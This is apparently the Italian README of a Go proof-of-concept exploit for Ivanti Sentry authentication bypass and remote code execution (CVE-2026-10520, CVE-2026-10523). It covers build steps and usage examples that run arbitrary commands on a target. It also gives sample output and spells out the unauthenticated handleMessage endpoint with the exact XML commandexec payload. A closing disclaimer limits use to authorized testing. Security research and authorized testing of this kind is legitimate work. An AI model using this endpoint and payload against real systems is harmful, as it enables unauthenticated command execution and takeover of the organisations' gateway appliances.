
Strumento di rilevamento proof-of-concept per le vulnerabilità di bypass dell'autenticazione e RCE di Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Invia richieste API appositamente create per eseguire comandi di sistema e convalidare le distribuzioni vulnerabili.
Un completo strumento proof-of-concept per il rilevamento e la validazione di vulnerabilità Ivanti Sentry relative al bypass dell'autenticazione e all'esecuzione remota di codice. Questo strumento identifica sistemi vulnerabili a CVE-2026-10520 e CVE-2026-10523.
Questo progetto è progettato per rilevare e convalidare se un'istanza Ivanti Sentry è vulnerabile a critici difetti di bypass dell'autenticazione ed esecuzione remota di codice. Lo strumento invia messaggi appositamente predisposti tramite l'API endpoint di Ivanti Sentry per eseguire comandi di sistema ed estrarre i risultati, consentendo a ricercatori di sicurezza e penetration tester di identificare distribuzioni vulnerabili.
Vulnerabilità di bypass dell'autenticazione in Ivanti Sentry che consente l'accesso non autenticato a endpoint API riservati.
Vulnerabilità di esecuzione remota di codice in Ivanti Sentry che permette l'esecuzione di comandi arbitrari di sistema attraverso l'API di messaggistica quando combinata con il bypass dell'autenticazione.
Clona il repository e spostati nella directory del progetto:
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry
Ottieni l'inizializzazione e la libreria dei pacchetti
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy
Compila l'eseguibile:
go build -o tot_poc tot_poc.go

Lo strumento richiede due parametri obbligatori: URL di destinazione e comando da eseguire.

Esegui un comando semplice sul target:
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
-url (obbligatorio): URL base del target incluso il protocollo (es. https://127.0.0.1:8443)-cmd (obbligatorio): Comando da eseguire per il rilevamento della vulnerabilità (es. "uname -a", "id", "whoami")-p o -proxy (opzionale): Indirizzo e porta del proxy per instradare il traffico (es. 127.0.0.1:8080)
Rileva la vulnerabilità con un semplice comando di informazioni di sistema:
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
Esegui con configurazione proxy:
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
Esegui comando per estrarre informazioni di sistema:
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
Lo strumento mostrerà:
Target: https://192.168.1.100:8443
Command: uname -a
[+] Invio del controllo di esecuzione comando a: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Il target sembra essere vulnerabile.
Output del comando:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
Target: https://192.168.1.100:8443
Command: uname -a
[+] Invio del controllo di esecuzione comando a: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Il target non sembra essere vulnerabile.
Lo strumento sfrutta l'endpoint /mics/api/v2/sentry/mics-config/handleMessage accessibile senza autenticazione. Il payload è costruito come:
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMANDO]</reqandres></commandexec>
La risposta contiene l'output del comando in formato XML all'interno di un tag success.
Questo strumento è fornito esclusivamente per scopi di test di sicurezza autorizzati e ricerca. Gli utenti sono gli unici responsabili di assicurarsi di avere la dovuta autorizzazione prima di testare qualsiasi sistema. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori declinano ogni responsabilità per uso improprio o danni causati da questo strumento.
GhostGTR666 - Gagaltotal666
Questo progetto è fornito così com'è per scopi di ricerca sulla sicurezza e formativi.